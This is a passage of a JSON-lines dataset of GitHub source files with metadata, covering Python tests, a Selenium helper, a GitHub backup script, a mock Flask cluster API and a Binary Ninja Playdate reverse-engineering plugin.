i, char in enumerate(col_indices)\n ]\n grid_str += f'\\n{Fore.CYAN + \"\".join(col_indices) + Fore.RESET}'\n\n return grid_str\n","repo_name":"scan-lan/wave_function_collapse_sudoku","sub_path":"ui/grid_to_string.py","file_name":"grid_to_string.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4669157834","text":"lines = open(\"input\", \"r\").readlines()\ncomb = {2: 1, 3: 7, 4: 4, 7: 8}\n\n\nans = 0\n\nfor line in lines:\n numbers = line.split(\"|\")[1].strip().split(\" \")\n for number in numbers:\n if comb.get(len(number)):\n ans += 
1\n\nprint(ans)","repo_name":"ProgHaj/AdventOfCode2021","sub_path":"8/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26365837187","text":"import gensim\nimport numpy as np\nfrom sklearn.utils import check_array\nimport pickle\nimport random\n\nclass DataFeed:\n def __init__(self,data_config):\n self.data_config = data_config\n self.table = self.table_load()\n\n f = open(self.data_config['pkl_filePath'],'rb')\n data_dic = pickle.load(f)\n self.source_data = data_dic['source_data']\n # random.shuffle(self.source_data)\n self.source_NETypes_num = data_dic['source_NETypes_num']\n self.target_train_data = data_dic['target_train_data']\n self.target_test_data =data_dic['target_test_data']\n self.target_NETypes_num = data_dic['target_NETypes_num']\n self.id2label_dic= data_dic['id2label_dic']\n\n def table_load(self):\n # vecfpath = self.data_config['table_filePath']\n # word_embed = gensim.models.KeyedVectors.load_word2vec_format(vecfpath, binary=False, datatype=np.float32)\n # embed_mat = word_embed.syn0\n # embed_mat = check_array(embed_mat, dtype='float32', order='C')\n f = open(self.data_config['table_filePath'],'rb')\n dictionary = pickle.load(f)\n del dictionary\n embed_mat = pickle.load(f)\n return embed_mat\n\n def table_generator(self):\n return self.table\n\n def source_data_generator(self,mode,**kwargs):\n if mode == 'train':\n batch_num = kwargs['batch_num']\n batch_size = kwargs['batch_size']\n data_temp = self.source_data[:]\n elif mode == 'test':\n data_temp = self.source_data[-1000:]\n\n if mode == 'train':\n train_size = len(data_temp)\n start = batch_num * batch_size % train_size\n end = (batch_num * batch_size + batch_size) % train_size\n if start < end:\n batch = data_temp[start:end]\n elif start >= end:\n batch = data_temp[start:]\n batch.extend(data_temp[0:end])\n else:\n batch = data_temp\n X = []\n Y_ = []\n for instance in batch:\n X.append(np.array(instance[0], dtype='int32'))\n Y_.append(np.array(instance[1], dtype='int32'))\n\n # during validation and test, to avoid errors are counted repeatedly,\n # we need to avoid the same data sended back repeately\n # print('X len: ',str(len(X)))\n # print('Y_ len: ',str(len(Y_)))\n # print('X: ')\n # for x in X:\n # print('type: ',type(x),' len: ',str(len(x)),'\\n')\n # np.array(X)\n # print('Y_: ')\n # for y in Y_:\n # print('type: ', type(y), ' len: ', str(len(y)), '\\n')\n # np.array(Y_)\n # print('====================')\n return (np.array(X,dtype='int32'), np.array(Y_,dtype='int32'))\n\n def target_data_generator(self,mode,**kwargs):\n if mode == 'train':\n batch_num = kwargs['batch_num']\n batch_size= kwargs['batch_size']\n data_temp = self.target_train_data[self.data_config['k_instances']]\n else:\n data_temp = self.target_test_data\n\n if mode == 'train':\n train_size = len(data_temp)\n start = batch_num * batch_size % train_size\n end = (batch_num * batch_size + batch_size) % train_size\n if start < end:\n batch = data_temp[start:end]\n elif start >= end:\n batch = data_temp[start:]\n batch.extend(data_temp[0:end])\n else:\n batch = data_temp\n X = []\n Y_ = []\n for instance in batch:\n X.append(np.array(instance[0], dtype='int32'))\n Y_.append(np.array(instance[1], dtype='int32'))\n\n # during validation and test, to avoid errors are counted repeatedly,\n # we need to avoid the same data sended back repeately\n return (np.array(X, dtype='int32'), np.array(Y_, dtype='int32'))\n\n def 
id2label_generator(self):\n return self.id2label_dic\n\n\nclass DataFeedTest:\n def __init__(self):\n pass","repo_name":"zapplea/emnlp_baseline","sub_path":"simple_multiclass/datafeed.py","file_name":"datafeed.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"43561253218","text":"import pytest\nfrom demoproject.demoapp.models import DemoMultipleModel, Sender1, Sender2\nfrom django.forms.models import modelform_factory\nfrom django.urls import reverse\nfrom strategy_field.utils import fqn\n\n\ndef pytest_generate_tests(metafunc):\n func_name = metafunc.function.__name__\n values = ids = []\n if \"target\" in metafunc.fixturenames:\n if func_name.endswith(\"_lookup_in\"):\n values = [\n lambda o: [fqn(o.sender[0])],\n lambda o: o.sender,\n lambda o: [fqn(Sender1), fqn(Sender2)],\n lambda o: [Sender1, Sender2],\n ]\n ids = [\"fqn(target.sender)\", \"target.sender\", \"fqn(Sender1)\", \"Sender1\"]\n else:\n values = [lambda o: [fqn(Sender1)], lambda o: [Sender1]]\n ids = [\"fqn(Sender1)\", \"Sender1\"]\n\n if \"demo_multiple_model\" in metafunc.fixturenames:\n values.extend([lambda o: [fqn(o.sender[0])], lambda o: o.sender])\n ids.extend([\"fqn(target.sender)\", \"target.sender\"])\n\n metafunc.parametrize(\"target\", values, ids=ids)\n\n\ndef test_field_none():\n d = DemoMultipleModel(sender=None)\n assert d.sender is None\n\n\n@pytest.mark.django_db\ndef test_field_none_saved():\n d = DemoMultipleModel(sender=None)\n d.sender = None\n d.save()\n assert d.sender is None\n\n\ndef test_field_empty():\n d = DemoMultipleModel(sender=[])\n assert d.sender == []\n\n\ndef test_field_empty_len():\n expected = 0\n d = DemoMultipleModel(sender=[])\n assert d.sender.__len__() == expected\n\n\ndef test_field():\n d = DemoMultipleModel(sender=Sender1)\n assert d.sender == [Sender1]\n\n\n@pytest.mark.django_db\ndef test_basic():\n d = DemoMultipleModel(sender=Sender1)\n d.save()\n assert d.sender == [Sender1]\n\n d = DemoMultipleModel(sender=[Sender1])\n d.save()\n assert d.sender == [Sender1]\n\n d = DemoMultipleModel()\n d.sender = Sender1\n d.save()\n assert d.sender == [Sender1]\n\n d = DemoMultipleModel()\n d.sender = [Sender1]\n d.save()\n assert d.sender == [Sender1]\n\n d = DemoMultipleModel()\n d.sender = [Sender1, Sender2]\n d.save()\n assert d.sender == [Sender1, Sender2]\n\n\n@pytest.mark.django_db\ndef test_model_save(target):\n d = DemoMultipleModel(sender=target(None))\n d.save()\n assert d.sender == [Sender1]\n\n\n@pytest.mark.django_db\ndef test_model_get_or_create(target):\n d, __ = DemoMultipleModel.objects.get_or_create(sender=target(None))\n assert d.sender == [Sender1]\n\n\n@pytest.mark.django_db\ndef test_model_load(demo_multiple_model):\n d = DemoMultipleModel.objects.get(pk=demo_multiple_model.pk)\n assert d.sender == [Sender1]\n\n\n@pytest.mark.django_db\ndef test_form(demo_multiple_model, registry):\n # demo_multiple_model._meta.get_field_by_name('sender')[0].registry = registry\n demo_multiple_model._meta.get_field(\"sender\").registry = registry\n form_class = modelform_factory(DemoMultipleModel, exclude=[])\n form = form_class(instance=demo_multiple_model)\n assert form.fields[\"sender\"].choices == registry.as_choices()\n\n\n@pytest.mark.django_db\ndef test_form_save(demo_multiple_model):\n form_class = modelform_factory(DemoMultipleModel, exclude=[])\n form = form_class(\n {\"sender\": [fqn(demo_multiple_model.sender[0])]}, instance=demo_multiple_model\n )\n 
form.is_valid()\n instance = form.save()\n assert instance.sender == demo_multiple_model.sender\n\n\n@pytest.mark.django_db\ndef test_form_not_valid(demo_multiple_model):\n form_class = modelform_factory(DemoMultipleModel, exclude=[])\n form = form_class(\n {\"sender\": [fqn(DemoMultipleModel)]}, instance=demo_multiple_model\n )\n assert not form.is_valid()\n assert form.errors[\"sender\"] == [\n \"Select a valid choice. \"\n \"demoproject.demoapp.models.DemoMultipleModel \"\n \"is not one of the available choices.\"\n ]\n\n\n@pytest.mark.django_db\ndef test_form_default(demo_multiple_model):\n form_class = modelform_factory(DemoMultipleModel, exclude=[])\n form = form_class(instance=demo_multiple_model)\n assert form.fields[\"sender\"].choices == [\n (\"demoproject.demoapp.models.Sender1\", \"demoproject.demoapp.models.Sender1\"),\n (\"demoproject.demoapp.models.Sender2\", \"demoproject.demoapp.models.Sender2\"),\n ]\n\n\n@pytest.mark.django_db\ndef test_admin_demo_multiple_model_add(webapp, admin_user):\n res = webapp.get(\"/demoapp/demomultiplemodel/add/\", user=admin_user)\n form = res.forms[\"demomultiplemodel_form\"]\n\n form[\"sender\"] = [\"demoproject.demoapp.models.Sender1\"]\n form.submit().follow()\n assert (\n DemoMultipleModel.objects.filter(\n sender=\"demoproject.demoapp.models.Sender1\"\n ).count()\n == 1\n )\n\n\n@pytest.mark.django_db\ndef test_admin_demo_multiple_model_edit(webapp, admin_user, demo_multiple_model):\n url = reverse(\n \"admin:demoapp_demomultiplemodel_change\", args=[demo_multiple_model.pk]\n )\n res = webapp.get(url, user=admin_user)\n form = res.forms[\"demomultiplemodel_form\"]\n\n form[\"sender\"] = [\"demoproject.demoapp.models.Sender2\"]\n form.submit().follow()\n assert (\n DemoMultipleModel.objects.filter(\n sender=\"demoproject.demoapp.models.Sender2\"\n ).count()\n == 1\n )\n\n\n@pytest.mark.django_db\ndef test_demo_multiple_model_lookup_equal(demo_multiple_model, target):\n assert (\n DemoMultipleModel.objects.get(sender=target(demo_multiple_model))\n == demo_multiple_model\n )\n\n\n@pytest.mark.django_db\ndef test_demo_multiple_model_lookup_contains(demo_multiple_model, target):\n assert (\n DemoMultipleModel.objects.get(sender__contains=target(demo_multiple_model))\n == demo_multiple_model\n )\n\n\n@pytest.mark.django_db\ndef test_demo_multiple_model_lookup_in(demo_multiple_model, target):\n with pytest.raises(TypeError):\n assert (\n DemoMultipleModel.objects.get(sender__in=[target(demo_multiple_model)])\n == demo_multiple_model\n )\n","repo_name":"saxix/django-strategy-field","sub_path":"tests/test_multiple.py","file_name":"test_multiple.py","file_ext":"py","file_size_in_byte":6013,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"74851315664","text":"import logging\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\n# Определение базового класса страницы\nclass BasePage:\n # Инициализация драйвера и базового URL\n def __init__(self, driver):\n self.driver = driver\n self.base_url = \"https://test-stand.gb.ru\"\n\n # Метод для поиска элемента на странице с заданным локатором и временем ожидания\n def find_element(self, locator, time=10):\n try:\n # Возвращаем элемент, если он найден в течение заданного времени ожидания\n return WebDriverWait(self.driver, time).until(EC.presence_of_element_located(locator),\n message=f\"Can't find element by 
locator {locator}\")\n except TimeoutException:\n # Записываем исключение в лог, если время ожидания истекло и элемент не был найден\n logging.exception(\"Timeout exception while searching for element with locator %s\", locator)\n return None\n\n # Метод для получения свойства элемента\n def get_element_property(self, mode, locator, property):\n # Ищем элемент\n element = self.find_element(mode, locator)\n if element:\n # Возвращаем значение свойства, если элемент найден\n return element.value_of_css_property(property)\n else:\n # Записываем ошибку в лог, если элемент не найден\n logging.error(\"Can't get property %s from non-existing element with locator %s\", property, locator)\n return None\n\n # Метод для перехода на сайт по базовому URL\n def go_to_site(self):\n try:\n self.driver.get(self.base_url)\n except Exception as e:\n # Записываем исключение в лог, если возникла ошибка при открытии сайта\n logging.exception(\"Exception occurred while opening site: %s\", e)\n\n # Метод для получения уведомления (alert)\n def get_alert(self, time=10):\n try:\n # Возвращаем уведомление, если оно появляется в течение заданного времени ожидания\n return WebDriverWait(self.driver, time).until(EC.alert_is_present(),\n message=\"Alert not found\")\n except TimeoutException:\n # Записываем исключение в лог, если время ожидания истекло и уведомление не появилось\n logging.exception(\"Timeout exception while waiting for alert\")\n return None\n","repo_name":"ikodzoev/web_test","sub_path":"HW_4/BaseApp.py","file_name":"BaseApp.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34628204318","text":"import unittest\nimport numpy as np\n\nfrom numpy.testing import assert_allclose\n\nfrom gpflow.models.svgp import SVGP\nfrom gpflow.models import GPR\nfrom gpflow.kernels import Matern52, RBF\nfrom gpflow.likelihoods import Gaussian, Bernoulli, MultiClass\nfrom gpflow.training import ScipyOptimizer\nfrom gpflow.training import NatGradOptimizer\nfrom doubly_stochastic_dgp.dgp import DGP, DGP_Base, DGP_Quad\nfrom doubly_stochastic_dgp.model_zoo import DGP_Collapsed\nfrom doubly_stochastic_dgp.layers import SGPR_Layer\nfrom doubly_stochastic_dgp.layer_initializations import init_layers_linear\n\nnp.random.seed(100)\n\nclass TestVsSingleLayer(unittest.TestCase):\n def setUp(self):\n Ns, N, M, D_X, D_Y = 5, 4, 2, 3, 2\n self.lik_var = 0.1\n\n self.X = np.random.uniform(size=(N, D_X))\n self.Y = np.random.uniform(size=(N, D_Y))\n self.Z = np.random.uniform(size=(M, D_Y))\n self.Xs = np.random.uniform(size=(Ns, D_X))\n self.D_Y = D_Y\n\n def test_single_layer(self):\n kern = RBF(1, lengthscales=0.1)\n layers = init_layers_linear(self.X, self.Y, self.X, [kern])\n\n lik = Gaussian()\n lik.variance = self.lik_var\n\n last_layer = SGPR_Layer(layers[-1].kern,\n layers[-1].feature.Z.read_value(),\n self.D_Y,\n layers[-1].mean_function)\n layers = layers[:-1] + [last_layer]\n\n m_dgp = DGP_Collapsed(self.X, self.Y, lik, layers)\n L_dgp = m_dgp.compute_log_likelihood()\n mean_dgp, var_dgp = m_dgp.predict_f_full_cov(self.Xs, 1)\n\n m_exact = GPR(self.X, self.Y, kern)\n m_exact.likelihood.variance = self.lik_var\n L_exact = m_exact.compute_log_likelihood()\n mean_exact, var_exact = m_exact.predict_f_full_cov(self.Xs)\n\n assert_allclose(L_dgp, L_exact, atol=1e-5, rtol=1e-5)\n assert_allclose(mean_dgp[0], mean_exact, atol=1e-5, rtol=1e-5)\n assert_allclose(var_dgp[0], var_exact, atol=1e-5, rtol=1e-5)\n\n\nclass 
TestVsNatGrads(unittest.TestCase):\n def test_2layer_vs_nat_grad(self):\n Ns, N, M = 5, 1, 50\n D_X, D_Y = 1, 1\n\n lik_var = 0.1\n\n X = np.random.uniform(size=(N, D_X))\n Y = np.random.uniform(size=(N, D_Y))\n Z = np.random.uniform(size=(M, D_Y))\n Xs = np.random.uniform(size=(Ns, D_X))\n\n Z[:N, :] = X[:M, :]\n\n def kerns():\n return [RBF(D_X, lengthscales=0.1),\n RBF(D_X, lengthscales=0.5)]\n layers_col = init_layers_linear(X, Y, Z, kerns())\n layers_ng = init_layers_linear(X, Y, Z, kerns())\n\n def lik():\n l = Gaussian()\n l.variance = lik_var\n return l\n\n last_layer = SGPR_Layer(layers_col[-1].kern,\n layers_col[-1].feature.Z.read_value(),\n D_Y,\n layers_col[-1].mean_function)\n\n layers_col = layers_col[:-1] + [last_layer]\n m_col = DGP_Collapsed(X, Y, lik(), layers_col)\n m_ng = DGP_Quad(X, Y, lik(), layers_ng, H=200)\n\n q_mu1 = np.random.randn(M, D_X)\n q_sqrt1 = np.random.randn(M, M)\n q_sqrt1 = np.tril(q_sqrt1)[None, :, :]\n\n for m in m_col, m_ng:\n m.layers[0].q_mu = q_mu1\n m.layers[0].q_sqrt = q_sqrt1\n\n p = [[m_ng.layers[-1].q_mu, m_ng.layers[-1].q_sqrt]]\n NatGradOptimizer(gamma=1.).minimize(m_ng, var_list=p, maxiter=1)\n\n\n assert_allclose(m_col.compute_log_likelihood(),\n m_ng.compute_log_likelihood())\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"UCL-SML/Doubly-Stochastic-DGP","sub_path":"tests/test_collapsed.py","file_name":"test_collapsed.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"48"} +{"seq_id":"15439823755","text":"import torch.distributed as dist\n\n\ndef get_dist_info():\n \"\"\"Get distributed info.\"\"\"\n if dist.is_available():\n initialized = dist.is_initialized()\n else:\n initialized = False\n if initialized:\n rank = dist.get_rank()\n world_size = dist.get_world_size()\n else:\n rank = 0\n world_size = 1\n return rank, world_size\n","repo_name":"FlowEternal/pointlanenet","sub_path":"model/vega/common/utils_torch.py","file_name":"utils_torch.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13736868082","text":"import os\nfrom distutils.sysconfig import get_python_lib\n\n#Set path\nprint(\">>> Add path to python library ...\")\n\npwd = os.getcwd()\nlib_path = get_python_lib()\npath_file = os.path.join(lib_path,'relocation.pth')\nwith open(path_file,'w') as f:\n f.write(pwd)\nf.close()\n\nprint(\"Done!\")\n","repo_name":"zijinping/CUHK_Seismology_Python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"23912721270","text":"import socket\nimport sys\n\nHOST, PORT = \"localhost\", 9999\nfileName = \" \".join(sys.argv[1:])\nwith open(fileName) as f:\n data = f.read()\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ntry:\n sock.connect((HOST, PORT))\n sock.sendall(bytes(data + \"\\n\", \"utf-8\"))\n\n # Receive data from the server and shut down\n received = str(sock.recv(1024), \"utf-8\")\nfinally:\n sock.close()\n\nprint(\"Sent: {}\".format(data))\nprint(\"Received: {}\".format(received))","repo_name":"abelousova/python-diht-2014","sub_path":"homework09.05/SendFile/Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31081183765","text":"class 
Solution:\n def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:\n Map = dict()\n \n for i in nums1:\n Map[i] = Map.get(i,0)+1\n \n res = []\n for num in nums2:\n if num in Map and Map[num]>0:\n Map[num] -= 1\n res.append(num)\n return res\n ","repo_name":"Merwan-J/competetive-programming","sub_path":"350-intersection-of-two-arrays-ii/350-intersection-of-two-arrays-ii.py","file_name":"350-intersection-of-two-arrays-ii.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"20869626496","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport requests\nimport json\nimport os\n\n# /home/lane\nbase_path = os.path.expanduser('~')\ngitbak_dir = f\"{base_path}/gitbak/\"\ntoken_file = f\"{gitbak_dir}/.token_file\"\n\nwith open(token_file, 'r') as fr:\n token_file_content = fr.read()\n token_file_content = token_file_content.strip()\n\n\"\"\"\n URL which able to retrieve PRIVATE repos:\n `https://api.github.com/search/repositories?q=user:zhanglintc`\n Note: `user` can be replaced with `org`, if you're tring to retrieve organization information.\n Refer: https://github.community/t/how-to-get-list-of-private-repositories-via-api-call/120175/2\n\n\n URL which only able to retrieve PUBLIC repos:\n `https://api.github.com/users/zhanglintc/repos`\n\n How to provide a access token:\n `https://developer.github.com/changes/2020-02-10-deprecating-auth-through-query-param/`\n\"\"\"\n\n\ntoken = token_file_content\nurl = \"https://api.github.com/search/repositories\"\n\n\ndef gitbak(userName):\n params = {\n 'q': f'user:{userName}',\n 'per_page': 999,\n }\n headers = {\n 'Authorization': f'token {token}',\n }\n res = requests.get(url, params=params, headers=headers)\n\n o = json.loads(res.text)\n items = o['items']\n repos = [it['ssh_url'] for it in items]\n\n if not os.path.exists('{0}/gitbak/{1}'.format(base_path, userName)):\n os.makedirs('{0}/gitbak/{1}'.format(base_path, userName))\n\n dirs = os.listdir('{0}/gitbak/{1}'.format(base_path, userName))\n\n for repo in repos:\n repoName = repo.split('/')[1][:-4]\n if repoName not in dirs:\n os.system('cd {0}/gitbak/{1} && git clone {2}'.format(base_path, userName, repo))\n else:\n os.system('cd {0}/gitbak/{1}/{2} && git pull'.format(base_path, userName, repoName))\n\nif __name__ == '__main__':\n gitbak(\"zhanglintc\")\n gitbak(\"Theodolite\")\n gitbak(\"Mmrz-Repos\")\n\nos.system('date >> {0}/gitbak/gitbak.log'.format(base_path))\n\n\n","repo_name":"zhanglintc/tools-lite","sub_path":"python/autopull.py","file_name":"autopull.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28713911199","text":"import json\nimport os\nimport re\nimport time\nfrom typing import Tuple\n\nimport flask.scaffold\nimport teradatasql\nimport werkzeug\nfrom flask import Flask, request\nfrom werkzeug.middleware.proxy_fix import ProxyFix\n\n\n# workaround to fix an import error of flask_restplus\nflask.helpers._endpoint_from_view_func = flask.scaffold._endpoint_from_view_func\nwerkzeug.cached_property = werkzeug.utils.cached_property # type: ignore\nfrom flask_restplus import Api, Resource, fields, marshal # noqa: E402\n\n\napp = Flask(__name__)\napp.wsgi_app = ProxyFix(app.wsgi_app)\napi = Api(app, validate=True, skip_none=True)\n\n\napi = api.namespace('', description='Dataproc Cluster operations')\n\ncluster = api.model('Cluster', {\n 'id': 
fields.Integer(readonly=True, description='The cluster unique identifier'),\n 'cluster': fields.String(required=True, description='The cluster details')\n})\n\njob = api.model('Job', {\n 'id': fields.Integer(readonly=True, description='The job unique identifier'),\n 'job': fields.String(required=True, description='The job details'),\n 'cluster_id': fields.String(required=True, description='The cluster details')\n\n})\n\nclass ClusterOperator(object):\n def __init__(self):\n self.counter = 0\n self.clusters = []\n\n def get(self, id):\n for cluster in self.clusters:\n if cluster['id'] == id:\n return cluster\n api.abort(404, \"cluster {} doesn't exist\".format(id))\n\n def create(self, data):\n cluster = data\n cluster['id'] = self.counter = self.counter + 1\n self.clusters.append(cluster)\n return cluster\n\n def delete(self, id):\n cluster = self.get(id)\n self.clusters.remove(cluster)\n\nclass JobOperator(object):\n def __init__(self):\n self.counter = 0\n self.jobs = []\n\n def get(self, id):\n for job in self.jobs:\n if job['id'] == id:\n return job\n api.abort(404, \"job {} doesn't exist\".format(id))\n\n def create(self, data):\n job = data\n job['id'] = self.counter = self.counter + 1\n self.jobs.append(job)\n return job\n\n\nClusterOperator = ClusterOperator()\nClusterOperator.create({'cluster': 'data-preparation-cluster-1'})\nClusterOperator.create({'cluster': 'data-preparation-cluster-2'})\nClusterOperator.create({'cluster': 'data-validation-cluster-1'})\n\n@api.route('/cluster')\nclass ClusterList(Resource):\n '''Shows a list of all clusters, and lets you POST to add new clusters'''\n @api.doc('list_clusters')\n @api.marshal_list_with(cluster)\n def get(self):\n '''List all clusters'''\n return ClusterOperator.clusters\n\n @api.doc('create_cluster')\n @api.expect(cluster)\n @api.marshal_with(cluster, code=201)\n def post(self):\n '''Create a new cluster'''\n return ClusterOperator.create(api.payload), 201\n\n\n@api.route('/cluster/')\n@api.response(404, 'cluster not found')\n@api.param('id', 'The cluster identifier')\nclass Cluster(Resource):\n '''Show a single cluster item and lets you delete them'''\n @api.doc('get_cluster')\n @api.marshal_with(cluster)\n def get(self, id):\n '''Fetch a given resource'''\n return ClusterOperator.get(id)\n\n @api.doc('delete_cluster')\n @api.response(204, 'cluster deleted')\n def delete(self, id):\n '''Delete a cluster given its identifier'''\n ClusterOperator.delete(id)\n return '', 204\n\n @api.expect(cluster)\n @api.marshal_with(cluster)\n def put(self, id):\n '''Update a cluster with the job given its identifier'''\n return ClusterOperator.update(id, api.payload)\n\n\nJobOperator = JobOperator()\nJobOperator.create({'job': 'dataprep-job-1', 'cluster_id': 'data-preparation-cluster-1'})\nJobOperator.create({'job': 'dataprep-job-2', 'cluster_id': 'data-preparation-cluster-1'})\nJobOperator.create({'job': 'dataprep-job-3', 'cluster_id': 'data-validation-cluster-1'})\n\n@api.route('/job')\nclass JobList(Resource):\n '''Shows a list of all jobs, and lets you POST to add new jobs'''\n @api.doc('list_jobs')\n @api.marshal_list_with(job)\n def get(self):\n '''List all jobs'''\n return JobOperator.jobs\n\n @api.doc('create_job')\n @api.expect(job)\n @api.marshal_with(job, code=201)\n def post(self):\n '''Create a new job'''\n return JobOperator.create(api.payload), 201\n\nif __name__ == '__manin__':\n app.run(host='127.0.0.1', 
port=5000)\n","repo_name":"yuyatinnefeld/google-cloud","sub_path":"app-engine/resources/swagger/cluster_temp.py","file_name":"cluster_temp.py","file_ext":"py","file_size_in_byte":4437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"19323524780","text":"#!/usr/bin/env python3\n\"\"\"Provides menu options to control the ``pd-ninja`` plugin.\n\"\"\"\nfrom binaryninja.binaryview import SectionSemantics\nfrom binaryninja.types import Symbol\nfrom binaryninja.types import SymbolType\nfrom binaryninja.plugin import PluginCommand\nfrom binaryninja.log import log_info\nfrom binaryninja.log import log_error\nfrom binaryninja.binaryview import BinaryView\nfrom binaryninja.typeparser import TypeParser\n\nfrom .pd_magic import IVT_LEN\nfrom .pd_magic import PD_HEADER_FLAGS\nfrom .pd_magic import PLAYDATE_KERNEL_START\nfrom .pd_magic import STM32F7_IVT_NAMES\nfrom .pd_magic import get_system_headers\nfrom .pd_utils import get_sdk_root\nfrom .pd_utils import addr_valid\nfrom .pd_utils import dest_section\nfrom .pd_types import make_stable_library\nfrom .pd_symbols_db import SymbolsDB\n\n\ndef apply_symbols_db(bv: BinaryView):\n \"\"\"Loads provided symbols from the SDK\n\n Parameters\n ----------\n bv : BinaryView\n SDK to process\n \"\"\"\n pd_sdk = get_sdk_root()\n if not pd_sdk:\n log_info(\"Failed to provide SDK path\")\n return\n\n thumb_addr_mask = 0xFFFFFFFE\n s = SymbolsDB(pd_sdk.symbols_db)\n log_info(f\"Loading symbols from symbols.db\")\n\n # note the omission of \"strip_hideen=True\", we postprocess here\n # and define an auto-function where all the hidden functions are\n # so binary ninja can still pick up all the functions to analyze\n funcs = s.get_first_functions()\n\n # make all these definitions 1 undo just in case\n # somthing is real borked up\n bv.begin_undo_actions()\n\n # add all the symbols, playdate calls them functions, which is\n # patently false, they're just a bunch of linker symbols\n for f in funcs:\n # don't need to worry about any kernel / user distinctions here\n if not addr_valid(bv, f.address):\n continue\n\n section = dest_section(bv, f.address)\n address = f.address & thumb_addr_mask\n\n # depending on the semantics of the section we will create\n # different symbol type\n if section.semantics & SectionSemantics.ReadOnlyCodeSectionSemantics:\n # code, define a function\n if f.name == \"hidden\":\n bv.define_auto_symbol_and_var_or_function(\n Symbol(SymbolType.FunctionSymbol, address,\n f\"sub_{hex(address)[2:]}\"), None\n )\n else:\n # not \"hidden\", so make an actual function\n bv.create_user_function(address)\n bv.define_user_symbol(\n Symbol(SymbolType.FunctionSymbol, address, f.name))\n else:\n # data\n if f.name == \"hidden\":\n bv.define_auto_symbol_and_var_or_function(\n Symbol(SymbolType.DataSymbol, address,\n f\"data_{hex(address)[2:]}\"), None\n )\n else:\n # not hidden, add a label with words, note that\n # the types are not specified, a lot of them are defined\n # in the ``make_yolo_library()`` calls in ``pd_magic`` tho\n bv.define_user_symbol(\n Symbol(SymbolType.DataSymbol, address, f.name))\n\n log_info(f\"Added {len(funcs)} labels from Symbols.db\")\n bv.commit_undo_actions()\n\n\ndef import_sdk_header(bv: BinaryView):\n \"\"\"Imports the types from the C_API header into\n the current binary view\n\n Parameters\n ----------\n bv : BinaryView\n bv to load the types into\n \"\"\"\n pd_sdk = get_sdk_root()\n if not pd_sdk:\n log_info(\"Failed to provide SDK path\")\n return\n\n # import the 
header file for the playdate SDK\n with open(str(pd_sdk.header_path), \"r\") as f:\n flags = PD_HEADER_FLAGS[\"flags\"]\n include_path = [str(pd_sdk.root / \"C_API\")]\n sys_include_path = get_system_headers()\n defines = PD_HEADER_FLAGS[\"defines\"]\n\n parsed = TypeParser.default.parse_types_from_source(\n f.read(),\n pd_sdk.header_path.name,\n bv.platform,\n None,\n flags + defines,\n include_path + sys_include_path)\n\n types = parsed[0].types\n functions = parsed[0].functions\n\n if parsed is None:\n log_error(\"Failed parsing header file\")\n return\n\n # add the functions and types so we can actually use them\n for t in types:\n bv.define_user_type(t.name, t.type)\n\n for f in functions:\n bv.define_user_type(f.name, f.type)\n\n log_info(\n f\"pd-ninja Loaded {len(types)} types, {len(functions)} functions.\")\n\n # add the stablized types\n make_stable_library(bv)\n\n\ndef add_platform_symbols(bv: BinaryView):\n \"\"\"Adds platform symbols to the binaryview\n\n Parameters\n ----------\n bv : BinaryView\n bv to modify\n \"\"\"\n # if we have a dump that contains the kernel + bootlaoder, tag the IVT\n log_info(\"Adding IVT Table\")\n # apply IVT Type\n ivt_type = bv.get_type_by_name(\"IVT_TABLE\")\n if not ivt_type:\n log_error(\"Must add pd-ninja types first!\")\n return\n\n bv.define_user_data_var(PLAYDATE_KERNEL_START, ivt_type)\n bv.define_user_symbol(\n Symbol(SymbolType.DataSymbol,\n PLAYDATE_KERNEL_START, \"ivt_table\")\n )\n\n # the first value in the IVT is the stack pointer, not a pointer\n thumb_addr_mask = 0xFFFFFFFE # binary ninja is bad at thumb\n ivt_labels_start = PLAYDATE_KERNEL_START + 4\n ivt_labels_end = ivt_labels_start + (IVT_LEN - 4)\n for i, addr in enumerate(range(ivt_labels_start, ivt_labels_end, 4)):\n # this iterator starts from 1 idx\n name = STM32F7_IVT_NAMES[i + 1]\n value = bv.read_int(addr, 4, False) & thumb_addr_mask\n bv.define_auto_symbol(\n Symbol(SymbolType.FunctionSymbol, value, name))\n\n log_info(\"Added IVT_TABLE and created appropriate function pointers\")\n\n\ndef apply_stabilized_types(bv: BinaryView):\n \"\"\"Applies known types to known symbols. 
